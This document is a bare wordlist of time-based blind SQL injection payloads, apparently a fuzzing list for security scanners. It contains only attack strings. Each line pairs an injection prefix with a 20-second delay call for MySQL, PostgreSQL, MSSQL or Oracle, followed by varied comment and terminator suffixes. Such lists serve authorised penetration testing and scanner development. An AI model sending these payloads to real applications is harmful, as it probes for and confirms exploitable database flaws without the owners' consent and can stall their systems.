'(dbms_pipe.receive_message(('a'),20) 
'(dbms_pipe.receive_message(('a'),20)"
'(dbms_pipe.receive_message(('a'),20)#
'(dbms_pipe.receive_message(('a'),20)'
'(dbms_pipe.receive_message(('a'),20))"
'(dbms_pipe.receive_message(('a'),20))'
'(dbms_pipe.receive_message(('a'),20)--
'(dbms_pipe.receive_message(('a'),20)-- -
'(dbms_pipe.receive_message(('a'),20)/*
'(dbms_pipe.receive_message(('a'),20);#
'(dbms_pipe.receive_message(('a'),20);%00
'(dbms_pipe.receive_message(('a'),20);--
'(dbms_pipe.receive_message(('a'),20);-- -
'(dbms_pipe.receive_message(('a'),20);/*
');SELECT SLEEP(20)
');SELECT SLEEP(20) 
');SELECT SLEEP(20)"
');SELECT SLEEP(20)#
');SELECT SLEEP(20)'
');SELECT SLEEP(20))"
');SELECT SLEEP(20))'
');SELECT SLEEP(20)--
');SELECT SLEEP(20)-- -
');SELECT SLEEP(20)/*
');SELECT SLEEP(20);#
');SELECT SLEEP(20);%00
');SELECT SLEEP(20);--
');SELECT SLEEP(20);-- -
');SELECT SLEEP(20);/*
');SELECT pg_sleep(20)
');SELECT pg_sleep(20) 
');SELECT pg_sleep(20)"
');SELECT pg_sleep(20)#
');SELECT pg_sleep(20)'
');SELECT pg_sleep(20))"
');SELECT pg_sleep(20))'
');SELECT pg_sleep(20)--
');SELECT pg_sleep(20)-- -
');SELECT pg_sleep(20)/*
');SELECT pg_sleep(20);#
');SELECT pg_sleep(20);%00
');SELECT pg_sleep(20);--
');SELECT pg_sleep(20);-- -
');SELECT pg_sleep(20);/*
');WAITFOR DELAY '0:0:20'
');WAITFOR DELAY '0:0:20' 
');WAITFOR DELAY '0:0:20'"
');WAITFOR DELAY '0:0:20'#
');WAITFOR DELAY '0:0:20''
');WAITFOR DELAY '0:0:20')"
');WAITFOR DELAY '0:0:20')'
');WAITFOR DELAY '0:0:20'--
');WAITFOR DELAY '0:0:20'-- -
');WAITFOR DELAY '0:0:20'/*
');WAITFOR DELAY '0:0:20';#
');WAITFOR DELAY '0:0:20';%00
');WAITFOR DELAY '0:0:20';--
');WAITFOR DELAY '0:0:20';-- -
');WAITFOR DELAY '0:0:20';/*
');dbms_pipe.receive_message(('a'),20)
');dbms_pipe.receive_message(('a'),20) 
');dbms_pipe.receive_message(('a'),20)"
');dbms_pipe.receive_message(('a'),20)#
');dbms_pipe.receive_message(('a'),20)'
');dbms_pipe.receive_message(('a'),20))"
');dbms_pipe.receive_message(('a'),20))'
');dbms_pipe.receive_message(('a'),20)--
');dbms_pipe.receive_message(('a'),20)-- -
');dbms_pipe.receive_message(('a'),20)/*
');dbms_pipe.receive_message(('a'),20);#
');dbms_pipe.receive_message(('a'),20);%00
');dbms_pipe.receive_message(('a'),20);--
');dbms_pipe.receive_message(('a'),20);-- -
');dbms_pipe.receive_message(('a'),20);/*
')SELECT SLEEP(20)
')SELECT SLEEP(20) 
')SELECT SLEEP(20)"
')SELECT SLEEP(20)#
')SELECT SLEEP(20)'
')SELECT SLEEP(20))"
')SELECT SLEEP(20))'
')SELECT SLEEP(20)--
')SELECT SLEEP(20)-- -
')SELECT SLEEP(20)/*
')SELECT SLEEP(20);#
')SELECT SLEEP(20);%00
')SELECT SLEEP(20);--
')SELECT SLEEP(20);-- -
')SELECT SLEEP(20);/*
')SELECT pg_sleep(20)
')SELECT pg_sleep(20) 
')SELECT pg_sleep(20)"
')SELECT pg_sleep(20)#
')SELECT pg_sleep(20)'
')SELECT pg_sleep(20))"
')SELECT pg_sleep(20))'
')SELECT pg_sleep(20)--
')SELECT pg_sleep(20)-- -
')SELECT pg_sleep(20)/*
')SELECT pg_sleep(20);#
')SELECT pg_sleep(20);%00
')SELECT pg_sleep(20);--
')SELECT pg_sleep(20);-- -
')SELECT pg_sleep(20);/*
')WAITFOR DELAY '0:0:20'
')WAITFOR DELAY '0:0:20' 
')WAITFOR DELAY '0:0:20'"
')WAITFOR DELAY '0:0:20'#
')WAITFOR DELAY '0:0:20''
')WAITFOR DELAY '0:0:20')"
')WAITFOR DELAY '0:0:20')'
')WAITFOR DELAY '0:0:20'--
')WAITFOR DELAY '0:0:20'-- -
')WAITFOR DELAY '0:0:20'/*
')WAITFOR DELAY '0:0:20';#
')WAITFOR DELAY '0:0:20';%00
')WAITFOR DELAY '0:0:20';--
')WAITFOR DELAY '0:0:20';-- -
')WAITFOR DELAY '0:0:20';/*
')dbms_pipe.receive_message(('a'),20)
')dbms_pipe.receive_message(('a'),20) 
')dbms_pipe.receive_message(('a'),20)"
')dbms_pipe.receive_message(('a'),20)#
')dbms_pipe.receive_message(('a'),20)'
')dbms_pipe.receive_message(('a'),20))"
')dbms_pipe.receive_message(('a'),20))'
')dbms_pipe.receive_message(('a'),20)--
')dbms_pipe.receive_message(('a'),20)-- -
')dbms_pipe.receive_message(('a'),20)/*
')dbms_pipe.receive_message(('a'),20);#
')dbms_pipe.receive_message(('a'),20);%00
')dbms_pipe.receive_message(('a'),20);--
')dbms_pipe.receive_message(('a'),20);-- -
')dbms_pipe.receive_message(('a'),20);/*
';)SELECT SLEEP(20)
';)SELECT SLEEP(20) 
';)SELECT SLEEP(20)"
';)SELECT SLEEP(20)#
';)SELECT SLEEP(20)'
';)SELECT SLEEP(20))"
';)SELECT SLEEP(20))'
';)SELECT SLEEP(20)--
';)SELECT SLEEP(20)-- -
';)SELECT SLEEP(20)/*
';)SELECT SLEEP(20);#
';)SELECT SLEEP(20);%00
';)SELECT SLEEP(20);--
';)SELECT SLEEP(20);-- -
';)SELECT SLEEP(20);/*
';)SELECT pg_sleep(20)
';)SELECT pg_sleep(20) 
';)SELECT pg_sleep(20)"
';)SELECT pg_sleep(20)#
';)SELECT pg_sleep(20)'
';)SELECT pg_sleep(20))"
';)SELECT pg_sleep(20))'
';)SELECT pg_sleep(20)--
';)SELECT pg_sleep(20)-- -
';)SELECT pg_sleep(20)/*
';)SELECT pg_sleep(20);#
';)SELECT pg_sleep(20);%00
';)SELECT pg_sleep(20);--
';)SELECT pg_sleep(20);-- -
';)SELECT pg_sleep(20);/*
';)WAITFOR DELAY '0:0:20'
';)WAITFOR DELAY '0:0:20' 
';)WAITFOR DELAY '0:0:20'"
';)WAITFOR DELAY '0:0:20'#
';)WAITFOR DELAY '0:0:20''
';)WAITFOR DELAY '0:0:20')"
';)WAITFOR DELAY '0:0:20')'
';)WAITFOR DELAY '0:0:20'--
';)WAITFOR DELAY '0:0:20'-- -
';)WAITFOR DELAY '0:0:20'/*
';)WAITFOR DELAY '0:0:20';#
';)WAITFOR DELAY '0:0:20';%00
';)WAITFOR DELAY '0:0:20';--
';)WAITFOR DELAY '0:0:20';-- -
';)WAITFOR DELAY '0:0:20';/*
';)dbms_pipe.receive_message(('a'),20)
';)dbms_pipe.receive_message(('a'),20) 
';)dbms_pipe.receive_message(('a'),20)"
';)dbms_pipe.receive_message(('a'),20)#
';)dbms_pipe.receive_message(('a'),20)'
';)dbms_pipe.receive_message(('a'),20))"
';)dbms_pipe.receive_message(('a'),20))'
';)dbms_pipe.receive_message(('a'),20)--
';)dbms_pipe.receive_message(('a'),20)-- -
';)dbms_pipe.receive_message(('a'),20)/*
';)dbms_pipe.receive_message(('a'),20);#
';)dbms_pipe.receive_message(('a'),20);%00
';)dbms_pipe.receive_message(('a'),20);--
';)dbms_pipe.receive_message(('a'),20);-- -
';)dbms_pipe.receive_message(('a'),20);/*
'SELECT SLEEP(20)
'SELECT SLEEP(20) 
'SELECT SLEEP(20)"
'SELECT SLEEP(20)#
'SELECT SLEEP(20)'
'SELECT SLEEP(20))"
'SELECT SLEEP(20))'
'SELECT SLEEP(20)--
'SELECT SLEEP(20)-- -
'SELECT SLEEP(20)/*
'SELECT SLEEP(20);#
'SELECT SLEEP(20);%00
'SELECT SLEEP(20);--
'SELECT SLEEP(20);-- -
'SELECT SLEEP(20);/*
'SELECT pg_sleep(20)
'SELECT pg_sleep(20) 
'SELECT pg_sleep(20)"
'SELECT pg_sleep(20)#
'SELECT pg_sleep(20)'
'SELECT pg_sleep(20))"
'SELECT pg_sleep(20))'
'SELECT pg_sleep(20)--
'SELECT pg_sleep(20)-- -
'SELECT pg_sleep(20)/*
'SELECT pg_sleep(20);#
'SELECT pg_sleep(20);%00
'SELECT pg_sleep(20);--
'SELECT pg_sleep(20);-- -
'SELECT pg_sleep(20);/*
'WAITFOR DELAY '0:0:20'
'WAITFOR DELAY '0:0:20' 
'WAITFOR DELAY '0:0:20'"
'WAITFOR DELAY '0:0:20'#
'WAITFOR DELAY '0:0:20''
'WAITFOR DELAY '0:0:20')"
'WAITFOR DELAY '0:0:20')'
'WAITFOR DELAY '0:0:20'--
'WAITFOR DELAY '0:0:20'-- -
'WAITFOR DELAY '0:0:20'/*
'WAITFOR DELAY '0:0:20';#
'WAITFOR DELAY '0:0:20';%00
'WAITFOR DELAY '0:0:20';--
'WAITFOR DELAY '0:0:20';-- -
'WAITFOR DELAY '0:0:20';/*
'dbms_pipe.receive_message(('a'),20)
'dbms_pipe.receive_message(('a'),20) 
'dbms_pipe.receive_message(('a'),20)"
'dbms_pipe.receive_message(('a'),20)#
'dbms_pipe.receive_message(('a'),20)'
'dbms_pipe.receive_message(('a'),20))"
'dbms_pipe.receive_message(('a'),20))'
'dbms_pipe.receive_message(('a'),20)--
'dbms_pipe.receive_message(('a'),20)-- -
'dbms_pipe.receive_message(('a'),20)/*
'dbms_pipe.receive_message(('a'),20);#
'dbms_pipe.receive_message(('a'),20);%00
'dbms_pipe.receive_message(('a'),20);--
'dbms_pipe.receive_message(('a'),20);-- -
'dbms_pipe.receive_message(('a'),20);/*
(SELECT SLEEP(20)
(SELECT SLEEP(20) 
(SELECT SLEEP(20)"
(SELECT SLEEP(20)#
(SELECT SLEEP(20)'
(SELECT SLEEP(20))"
(SELECT SLEEP(20))'
(SELECT SLEEP(20)--
(SELECT SLEEP(20)-- -
(SELECT SLEEP(20)/*
(SELECT SLEEP(20);#
(SELECT SLEEP(20);%00
(SELECT SLEEP(20);--
(SELECT SLEEP(20);-- -
(SELECT SLEEP(20);/*
(SELECT pg_sleep(20)
(SELECT pg_sleep(20) 
(SELECT pg_sleep(20)"
(SELECT pg_sleep(20)#
(SELECT pg_sleep(20)'
(SELECT pg_sleep(20))"
(SELECT pg_sleep(20))'
(SELECT pg_sleep(20)--
(SELECT pg_sleep(20)-- -
(SELECT pg_sleep(20)/*
(SELECT pg_sleep(20);#
(SELECT pg_sleep(20);%00
(SELECT pg_sleep(20);--
(SELECT pg_sleep(20);-- -
(SELECT pg_sleep(20);/*
(WAITFOR DELAY '0:0:20'
(WAITFOR DELAY '0:0:20' 
(WAITFOR DELAY '0:0:20'"
(WAITFOR DELAY '0:0:20'#
(WAITFOR DELAY '0:0:20''
(WAITFOR DELAY '0:0:20')"
(WAITFOR DELAY '0:0:20')'
(WAITFOR DELAY '0:0:20'--
(WAITFOR DELAY '0:0:20'-- -
(WAITFOR DELAY '0:0:20'/*
(WAITFOR DELAY '0:0:20';#
(WAITFOR DELAY '0:0:20';%00
(WAITFOR DELAY '0:0:20';--
(WAITFOR DELAY '0:0:20';-- -
(WAITFOR DELAY '0:0:20';/*
(dbms_pipe.receive_message(('a'),20)
(dbms_pipe.receive_message(('a'),20) 
(dbms_pipe.receive_message(('a'),20)"
(dbms_pipe.receive_message(('a'),20)#
(dbms_pipe.receive_message(('a'),20)'
(dbms_pipe.receive_message(('a'),20))"
(dbms_pipe.receive_message(('a'),20))'
(dbms_pipe.receive_message(('a'),20)--
(dbms_pipe.receive_message(('a'),20)-- -
(dbms_pipe.receive_message(('a'),20)/*
(dbms_pipe.receive_message(('a'),20);#
(dbms_pipe.receive_message(('a'),20);%00
(dbms_pipe.receive_message(('a'),20);--
(dbms_pipe.receive_message(('a'),20);-- -
(dbms_pipe.receive_message(('a'),20);/*
+SELECT SLEEP(20)
+SELECT SLEEP(20) 
+SELECT SLEEP(20)"
+SELECT SLEEP(20)#
+SELECT SLEEP(20)'
+SELECT SLEEP(20))"
+SELECT SLEEP(20))'
+SELECT SLEEP(20)--
+SELECT SLEEP(20)-- -
+SELECT SLEEP(20)/*
+SELECT SLEEP(20);#
+SELECT SLEEP(20);%00
+SELECT SLEEP(20);--
+SELECT SLEEP(20);-- -
+SELECT SLEEP(20);/*
+SELECT pg_sleep(20)
+SELECT pg_sleep(20) 
+SELECT pg_sleep(20)"
+SELECT pg_sleep(20)#
+SELECT pg_sleep(20)'
+SELECT pg_sleep(20))"
+SELECT pg_sleep(20))'
+SELECT pg_sleep(20)--
+SELECT pg_sleep(20)-- -
+SELECT pg_sleep(20)/*
+SELECT pg_sleep(20);#
+SELECT pg_sleep(20);%00
+SELECT pg_sleep(20);--
+SELECT pg_sleep(20);-- -
+SELECT pg_sleep(20);/*
+WAITFOR DELAY '0:0:20'
+WAITFOR DELAY '0:0:20' 
+WAITFOR DELAY '0:0:20'"
+WAITFOR DELAY '0:0:20'#
+WAITFOR DELAY '0:0:20''
+WAITFOR DELAY '0:0:20')"
+WAITFOR DELAY '0:0:20')'
+WAITFOR DELAY '0:0:20'--
+WAITFOR DELAY '0:0:20'-- -
+WAITFOR DELAY '0:0:20'/*
+WAITFOR DELAY '0:0:20';#
+WAITFOR DELAY '0:0:20';%00
+WAITFOR DELAY '0:0:20';--
+WAITFOR DELAY '0:0:20';-- -
+WAITFOR DELAY '0:0:20';/*
+dbms_pipe.receive_message(('a'),20)
+dbms_pipe.receive_message(('a'),20) 
+dbms_pipe.receive_message(('a'),20)"
+dbms_pipe.receive_message(('a'),20)#
+dbms_pipe.receive_message(('a'),20)'
+dbms_pipe.receive_message(('a'),20))"
+dbms_pipe.receive_message(('a'),20))'
+dbms_pipe.receive_message(('a'),20)--
+dbms_pipe.receive_message(('a'),20)-- -
+dbms_pipe.receive_message(('a'),20)/*
+dbms_pipe.receive_message(('a'),20);#
+dbms_pipe.receive_message(('a'),20);%00
+dbms_pipe.receive_message(('a'),20);--
+dbms_pipe.receive_message(('a'),20);-- -
+dbms_pipe.receive_message(('a'),20);/*
-SELECT SLEEP(20)
-SELECT SLEEP(20) 
-SELECT SLEEP(20)"
-SELECT SLEEP(20)#
-SELECT SLEEP(20)'
-SELECT SLEEP(20))"
-SELECT SLEEP(20))'
-SELECT SLEEP(20)--
-SELECT SLEEP(20)-- -
-SELECT SLEEP(20)/*
-SELECT SLEEP(20);#
-SELECT SLEEP(20);%00
-SELECT SLEEP(20);--
-SELECT SLEEP(20);-- -
-SELECT SLEEP(20);/*
-SELECT pg_sleep(20)
-SELECT pg_sleep(20) 
-SELECT pg_sleep(20)"
-SELECT pg_sleep(20)#
-SELECT pg_sleep(20)'
-SELECT pg_sleep(20))"
-SELECT pg_sleep(20))'
-SELECT pg_sleep(20)--
-SELECT pg_sleep(20)-- -
-SELECT pg_sleep(20)/*
-SELECT pg_sleep(20);#
-SELECT pg_sleep(20);%00
-SELECT pg_sleep(20);--
-SELECT pg_sleep(20);-- -
-SELECT pg_sleep(20);/*
-WAITFOR DELAY '0:0:20'
-WAITFOR DELAY '0:0:20' 
-WAITFOR DELAY '0:0:20'"
-WAITFOR DELAY '0:0:20'#
-WAITFOR DELAY '0:0:20''
-WAITFOR DELAY '0:0:20')"
-WAITFOR DELAY '0:0:20')'
-WAITFOR DELAY '0:0:20'--
-WAITFOR DELAY '0:0:20'-- -
-WAITFOR DELAY '0:0:20'/*
-WAITFOR DELAY '0:0:20';#
-WAITFOR DELAY '0:0:20';%00
-WAITFOR DELAY '0:0:20';--
-WAITFOR DELAY '0:0:20';-- -
-WAITFOR DELAY '0:0:20';/*
-dbms_pipe.receive_message(('a'),20)
-dbms_pipe.receive_message(('a'),20) 
-dbms_pipe.receive_message(('a'),20)"
-dbms_pipe.receive_message(('a'),20)#
-dbms_pipe.receive_message(('a'),20)'
-dbms_pipe.receive_message(('a'),20))"
-dbms_pipe.receive_message(('a'),20))'
-dbms_pipe.receive_message(('a'),20)--
-dbms_pipe.receive_message(('a'),20)-- -
-dbms_pipe.receive_message(('a'),20)/*
-dbms_pipe.receive_message(('a'),20);#
-dbms_pipe.receive_message(('a'),20);%00
-dbms_pipe.receive_message(('a'),20);--
-dbms_pipe.receive_message(('a'),20);-- -
-dbms_pipe.receive_message(('a'),20);/*
=SELECT SLEEP(20)
=SELECT SLEEP(20) 
=SELECT SLEEP(20)"
=SELECT SLEEP(20)#
=SELECT SLEEP(20)'
=SELECT SLEEP(20))"
=SELECT SLEEP(20))'
=SELECT SLEEP(20)--
=SELECT SLEEP(20)-- -
=SELECT SLEEP(20)/*
=SELECT SLEEP(20);#
=SELECT SLEEP(20);%00
=SELECT SLEEP(20);--
=SELECT SLEEP(20);-- -
=SELECT SLEEP(20);/*
=SELECT pg_sleep(20)
=SELECT pg_sleep(20) 
=SELECT pg_sleep(20)"
=SELECT pg_sleep(20)#
=SELECT pg_sleep(20)'
=SELECT pg_sleep(20))"
=SELECT pg_sleep(20))'
=SELECT pg_sleep(20)--
=SELECT pg_sleep(20)-- -
=SELECT pg_sleep(20)/*
=SELECT pg_sleep(20);#
=SELECT pg_sleep(20);%00
=SELECT pg_sleep(20);--
=SELECT pg_sleep(20);-- -
=SELECT pg_sleep(20);/*
=WAITFOR DELAY '0:0:20'
=WAITFOR DELAY '0:0:20' 
=WAITFOR DELAY '0:0:20'"
=WAITFOR DELAY '0:0:20'#
=WAITFOR DELAY '0:0:20''
=WAITFOR DELAY '0:0:20')"
=WAITFOR DELAY '0:0:20')'
=WAITFOR DELAY '0:0:20'--
=WAITFOR DELAY '0:0:20'-- -
=WAITFOR DELAY '0:0:20'/*
=WAITFOR DELAY '0:0:20';#
=WAITFOR DELAY '0:0:20';%00
=WAITFOR DELAY '0:0:20';--
=WAITFOR DELAY '0:0:20';-- -
=WAITFOR DELAY '0:0:20';/*
=dbms_pipe.receive_message(('a'),20)
=dbms_pipe.receive_message(('a'),20) 
=dbms_pipe.receive_message(('a'),20)"
=dbms_pipe.receive_message(('a'),20)#
=dbms_pipe.receive_message(('a'),20)'
=dbms_pipe.receive_message(('a'),20))"
=dbms_pipe.receive_message(('a'),20))'
=dbms_pipe.receive_message(('a'),20)--
=dbms_pipe.receive_message(('a'),20)-- -
=dbms_pipe.receive_message(('a'),20)/*
=dbms_pipe.receive_message(('a'),20);#
=dbms_pipe.receive_message(('a'),20);%00
=dbms_pipe.receive_message(('a'),20);--
=dbms_pipe.receive_message(('a'),20);-- -
=dbms_pipe.receive_message(('a'),20);/*
SELECT SLEEP(20)
SELECT SLEEP(20) 
SELECT SLEEP(20)"
SELECT SLEEP(20)#
SELECT SLEEP(20)'
SELECT SLEEP(20))"
SELECT SLEEP(20))'
SELECT SLEEP(20)--
SELECT SLEEP(20)-- -
SELECT SLEEP(20)/*
SELECT SLEEP(20);#
SELECT SLEEP(20);%00
SELECT SLEEP(20);--
SELECT SLEEP(20);-- -
SELECT SLEEP(20);/*
SELECT pg_sleep(20)
SELECT pg_sleep(20) 
SELECT pg_sleep(20)"
SELECT pg_sleep(20)#
SELECT pg_sleep(20)'
SELECT pg_sleep(20))"
SELECT pg_sleep(20))'
SELECT pg_sleep(20)--
SELECT pg_sleep(20)-- -
SELECT pg_sleep(20)/*
SELECT pg_sleep(20);#
SELECT pg_sleep(20);%00
SELECT pg_sleep(20);--
SELECT pg_sleep(20);-- -
SELECT pg_sleep(20);/*
WAITFOR DELAY '0:0:20'
WAITFOR DELAY '0:0:20' 
WAITFOR DELAY '0:0:20'"
WAITFOR DELAY '0:0:20'#
WAITFOR DELAY '0:0:20''
WAITFOR DELAY '0:0:20')"
WAITFOR DELAY '0:0:20')'
WAITFOR DELAY '0:0:20'--
WAITFOR DELAY '0:0:20'-- -
WAITFOR DELAY '0:0:20'/*
WAITFOR DELAY '0:0:20';#
WAITFOR DELAY '0:0:20';%00
WAITFOR DELAY '0:0:20';--
WAITFOR DELAY '0:0:20';-- -
WAITFOR DELAY '0:0:20';/*
dbms_pipe.receive_message(('a'),20)
dbms_pipe.receive_message(('a'),20) 
dbms_pipe.receive_message(('a'),20)"
dbms_pipe.receive_message(('a'),20)#
dbms_pipe.receive_message(('a'),20)'
dbms_pipe.receive_message(('a'),20))"
dbms_pipe.receive_message(('a'),20))'
dbms_pipe.receive_message(('a'),20)--
dbms_pipe.receive_message(('a'),20)-- -
dbms_pipe.receive_message(('a'),20)/*
dbms_pipe.receive_message(('a'),20);#
dbms_pipe.receive_message(('a'),20);%00
dbms_pipe.receive_message(('a'),20);--
dbms_pipe.receive_message(('a'),20);-- -
dbms_pipe.receive_message(('a'),20);/*
||SELECT SLEEP(20)
||SELECT SLEEP(20) 
||SELECT SLEEP(20)"
||SELECT SLEEP(20)#
||SELECT SLEEP(20)'
||SELECT SLEEP(20))"
||SELECT SLEEP(20))'
||SELECT SLEEP(20)--
||SELECT SLEEP(20)-- -
||SELECT SLEEP(20)/*
||SELECT SLEEP(20);#
||SELECT SLEEP(20);%00
||SELECT SLEEP(20);--
||SELECT SLEEP(20);-- -
||SELECT SLEEP(20);/*
||SELECT pg_sleep(20)
||SELECT pg_sleep(20) 
||SELECT pg_sleep(20)"
||SELECT pg_sleep(20)#
||SELECT pg_sleep(20)'
||SELECT pg_sleep(20))"
||SELECT pg_sleep(20))'
||SELECT pg_sleep(20)--
||SELECT pg_sleep(20)-- -
||SELECT pg_sleep(20)/*
||SELECT pg_sleep(20);#
||SELECT pg_sleep(20);%00
||SELECT pg_sleep(20);--
||SELECT pg_sleep(20);-- -
||SELECT pg_sleep(20);/*
||WAITFOR DELAY '0:0:20'
||WAITFOR DELAY '0:0:20' 
||WAITFOR DELAY '0:0:20'"
||WAITFOR DELAY '0:0:20'#
||WAITFOR DELAY '0:0:20''
||WAITFOR DELAY '0:0:20')"
||WAITFOR DELAY '0:0:20')'
||WAITFOR DELAY '0:0:20'--
||WAITFOR DELAY '0:0:20'-- -
||WAITFOR DELAY '0:0:20'/*
||WAITFOR DELAY '0:0:20';#
||WAITFOR DELAY '0:0:20';%00
||WAITFOR DELAY '0:0:20';--
||WAITFOR DELAY '0:0:20';-- -
||WAITFOR DELAY '0:0:20';/*
||dbms_pipe.receive_message(('a'),20)
||dbms_pipe.receive_message(('a'),20) 
||dbms_pipe.receive_message(('a'),20)"
||dbms_pipe.receive_message(('a'),20)#
||dbms_pipe.receive_message(('a'),20)'
||dbms_pipe.receive_message(('a'),20))"
||dbms_pipe.receive_message(('a'),20))'
||dbms_pipe.receive_message(('a'),20)--
||dbms_pipe.receive_message(('a'),20)-- -
||dbms_pipe.receive_message(('a'),20)/*
||dbms_pipe.receive_message(('a'),20);#
||dbms_pipe.receive_message(('a'),20);%00
||dbms_pipe.receive_message(('a'),20);--
||dbms_pipe.receive_message(('a'),20);-- -
||dbms_pipe.receive_message(('a'),20);/*
